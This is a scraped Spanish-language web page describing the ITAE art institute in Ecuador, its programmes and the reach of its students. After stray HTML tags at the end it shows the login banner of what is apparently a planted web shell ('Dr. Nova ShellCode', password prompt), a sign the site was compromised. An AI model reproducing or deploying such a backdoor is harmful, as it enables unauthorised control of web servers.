INSTITUTO TECNOLÓGICO DE ARTES DEL ECUADOR (ITAE)

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

El ITAE es institución educativa formada por artistas comprometidos con el cambio y el crecimiento constante de la escena artística local y global, en permanente diálogo con la historia y la contemporaneidad. Cuenta con alrededor de 120 esutdiantes en total; no es lugar para aprender la práctica formal del arte, sino más un Instituto donde se aprenden las "herramientas-tecnologías" y los procesos de trabajo (así como tener una idea multidiscplinaria de las herramientas tradicionales).

Una rama fundamental para los alumnos es la de "Proyectos", donde se genera buena parte de la reflexión crítica sobre el proceso de trabajo y se encuentran todos los grupos. La materia de "Proyectos" obliga a los alumnos a asumir retos y desarrollos de procesos creativos desde muy temprano. Los talleres buscan poner al mismo nivel todos los medios. En el caso de medios digitales, es muy intenso; por tanto, los que hacen pintura ya no hacen nuevos medios. Algunos de los estudiantes que asisten al ITAE usualmente tienen preparación previa en el campo del arte. Empieza con un ciclo básico de un año y luego una mención (o especialización) donde entra con un conocimiento preliminar y en la que se desarrolla una discusión abierta sobre la obra de cada artista. Han incidido en Guayaquil y Ecuador de una forma drástica, pues buena parte de los alumnos ha ganado premios nacionales, lo que genera un hito y una diferenciación mediante un proceso más cercano a la reflexión crítica.

<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |